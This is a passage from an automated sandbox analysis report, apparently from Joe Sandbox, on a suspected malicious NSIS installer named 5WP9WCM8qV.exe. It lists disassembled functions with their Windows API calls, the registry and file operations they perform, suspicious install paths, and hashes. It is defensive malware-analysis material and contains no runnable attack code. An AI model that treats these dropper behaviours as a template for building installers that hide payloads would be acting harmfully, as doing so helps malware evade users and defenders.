Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 004051B4: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Strings

C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll, xrefs: 0040182D, 00401849
C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes, xrefs: 00401796
C:\Users\user\AppData\Local\Temp\nse2681.tmp, xrefs: 00401819, 00401837
Call, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nse2681.tmp$C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes$Call
API String ID: 1941528284-2568952899
Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

Function 004051B4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll, xrefs: 004051D5, 004051E5, 004051EB, 0040520E, 0040521A

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll
API String ID: 2531174081-308657127
Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

... %d%%, xrefs: 0040316E
jA, xrefs: 004030E7
jA, xrefs: 004031F1

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: jA$ jA$... %d%%
API String ID: 551687249-2167919867
Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

C:\Users\user\AppData\Local\Temp\nse2681.tmp, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nse2681.tmp
API String ID: 1356686001-3553509657
Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
GetLastError.KERNEL32 ref: 004056DA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
GetLastError.KERNEL32 ref: 004056F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-4083868402
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
Opcode Fuzzy Hash: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNELBASE(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Function 00405B11 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 00405B6A
GetFileAttributesW.KERNELBASE(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
4Wu, xrefs: 00405B13

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4Wu$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3057243036
Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD

Function 00405F22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90

Strings

Call, xrefs: 00405F25

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5

Function 00405C59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C77
GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92

Strings

nsa, xrefs: 00405C66
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5E

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1331003597
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
wsprintfW.USER32 ref: 00406411
LoadLibraryW.KERNELBASE(?), ref: 00406421

Strings

%s%S.dll, xrefs: 0040640B

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
